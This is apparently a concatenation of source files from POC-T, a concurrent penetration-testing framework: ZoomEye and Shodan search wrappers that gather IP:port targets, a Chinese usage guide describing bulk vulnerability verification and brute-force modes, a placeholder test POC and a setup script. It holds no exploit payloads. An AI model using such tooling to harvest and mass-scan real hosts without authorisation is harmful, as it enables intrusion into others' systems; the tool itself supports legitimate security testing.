            if _isPrivateIP(each):
                ans.remove(each)

    return ans


def _isPrivateIP(strict_IP):
    p1 = re.compile(r'^10\.|^172\.(?:1[6789]|2\d|31)\.|^192\.168\.|^127\.')
    return True if re.match(p1, strict_IP) else False


if __name__ == '__main__':
    import sys

    try:
        c = sys.argv[1]
    except:
        c = raw_input('content > ')
    finally:
        print getIP(c)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T

import os
from lib.api.zoomeye.zoomeye import ZoomEye
from lib.core.data import logger
from lib.core.log import CUSTOM_LOGGING
from lib.core.enums import EXIT_STATUS
from lib.core.common import systemQuit


def _initial():
    z = ZoomEye()
    token_path = os.path.join(os.path.expanduser('~'), '.zoomeye-token')
    if not os.path.isfile(token_path):
        msg = 'ZoomEye API authorization failed, Please input ZoomEye Email and Password.'
        logger.log(CUSTOM_LOGGING.SUCCESS, msg)
        token = z.login()
        if token:
            open(token_path, 'w').write(token)
            msg = 'Save ZoomEye access token to: ' + token_path
            logger.log(CUSTOM_LOGGING.SUCCESS, msg)
        else:
            msg = 'Invalid ZoomEye username or password.'
            logger.log(CUSTOM_LOGGING.ERROR, msg)
            systemQuit(EXIT_STATUS.ERROR_EXIT)

    else:
        msg = 'Load ZoomEye access token from: ' + token_path
        logger.log(CUSTOM_LOGGING.SUCCESS, msg)
        z.setToken(open(token_path).read())
    try:
        info = z.resources_info()['resources']
    except TypeError:
        msg = 'Token invalid or expired, please re-run it to get a new token.'
        logger.log(CUSTOM_LOGGING.WARNING, msg)
        os.remove(token_path)
        systemQuit(EXIT_STATUS.ERROR_EXIT)

    if info:
        msg = 'Available ZoomEye search, web-search:{}, host-search:{}'.format(info['web-search'], info['host-search'])
        logger.log(CUSTOM_LOGGING.SYSINFO, msg)
    else:
        os.remove(token_path)
        msg = 'ZoomEye API authorization failed, Please re-run it and enter a new token.'
        logger.log(CUSTOM_LOGGING.ERROR, msg)
        systemQuit(EXIT_STATUS.ERROR_EXIT)

    return z


def dorkSearch(query, type='host', page=1):
    z = _initial()
    ans = []
    for page_n in range(page):
        data = z.dork_search(query, resource=type, page=page_n)
        if data:
            for i in data:
                ip_str = i.get('ip')
                if i.has_key('portinfo'):
                    ip_str = ip_str + ':' + str(i.get('portinfo').get('port'))
                ans.append(ip_str)
        else:
            break
    return ans



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T

u"""
本文档为程序中文使用说明，您也可以使用 -h 查看英文版使用说明
powered by cdxy <mail:i@cdxy.me>

使用方法:
  python POC-T.py [-T|-C] [-m NAME] [-s|-f|-i|-n VALUE] [options]
  python POC-T.py [-h|-v|--show|--update]

示例:
  python POC-T.py -T -m jboss-poc -s http://www.cdxy.me
  python POC-T.py -T -m test -f ./dic/1-100.txt
  python POC-T.py -C -m test -i 1-100
  python POC-T.py -C -m spider -n 10.0.0.0/24
  python POC-T.py -T -m test --api --dork "port:21" --max-page 5
  python POC-T.py -T -m test --api --query "solr country:cn" --limit 10 --offset 0

引擎(必需项):
  -T             多线程模式
  -C             协程(单线程异步)模式
  -t NUM         设置并发数量(线程数量)，默认为10

模块(必需项):
  -m NAME        指定加载的POC或模块名称(结尾不需加.py)

目标(必需项):
  -s TARGET      验证单个目标 (e.g. www.wooyun.org)
  -f FILE        从文件加载目标列表(常用于扫描或批量漏洞验证) (e.g. ./data/wooyun_domain)
  -i START-END   给定起始数字和结束数字，自动生成payload(常用于有数字规则的遍历，爬虫等) (e.g. 1-100)
  -n IP/MASK     从IP和子网掩码加载目标(用于扫描网段) (e.g. 127.0.0.0/24)
  --api          从搜索引擎中获取目标(ZoomEye/Shodan/Censys)

可选项:
  -o FILE        输出文件路径，默认保存在./output/目录下
  --single       当验证到一个结果时退出(常用于密码爆破)
  --nF           取消文件输出
  --nS           取消屏幕输出
  --show         显示所有可用的模块名称(./module/文件夹下)
  --browser      程序结束后，将运行结果在浏览器/记事本中打开
  --debug        开启debug模式，运行时将输出一些参数细节
  --update       自动从github更新程序
  -v, --version  版本号
  -h, --help     英文帮助
  -hc, --helpCN  中文帮助

ZoomEye API:
  --dork STRING       ZoomEye 搜索关键字
  --max-page PAGE     (可选) 最大爬取页数(每页20条数据/默认获取一页)
  --search-type TYPE  (可选) 选取搜索模式:web/host，默认为二者均是

Shodan API:
  --query STRING      Shodan 搜索关键字
  --limit LIMIT       (可选) 最大爬取记录数(默认获取100条)
  --offset OFFSET     (可选) 设置从第几条记录开始爬取

"""



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T

import shodan
import os
from shodan.exception import APIError


def _initial():
    api_path = os.path.join(os.path.expanduser('~'), '.shodan-api-key')
    if not os.path.isfile(api_path):
        with open(api_path, 'w') as fp:
            fp.write(raw_input('[-] First time using Shodan-API, please input your API-KEY > '))
    API_KEY = open(api_path).read().strip()
    return shodan.Shodan(API_KEY)


def advancedQuery(query, offset=0, limit=100):
    api = _initial()
    try:
        result = api.search(query=query, offset=offset, limit=limit)
    except APIError, e:
        print e
        print 'Please re-run it and enter a new API-KEY.'
        os.remove(os.path.join(os.path.expanduser('~'), '.shodan-api-key'))
        return []
    if result.has_key('matches'):
        anslist = []
        for match in result['matches']:
            anslist.append(match['ip_str'] + ':' + str(match['port']))
        return anslist
    else:
        return []



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T

"""
测试用例
"""

import random
import time


def poc(str):
    time.sleep(3)
    if 6 > 5:
        return True
    return False



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = i@cdxy.me
# project = https://github.com/Xyntax/POC-T

from setuptools import setup, find_packages
from lib.core.settings import VERSION, AUTHOR, MAIL, PROJECT, GIT_PAGE, LICENSE

setup(
    name=PROJECT,
    version=VERSION,
    keywords=('pentest', 'PoC', 'Exp', 'bruteforce', 'spider', 'POC-T'),
    description='POC-T: Pentest Over Concurrent Toolkit',
    license=LICENSE,
    install_requires=['gevent', 'requests', 'shodan'],
    url=GIT_PAGE,
    author=AUTHOR,
    author_email=MAIL,
    include_package_data=True,
    zip_safe=False,
    packages=find_packages(),
    platforms='any',
)
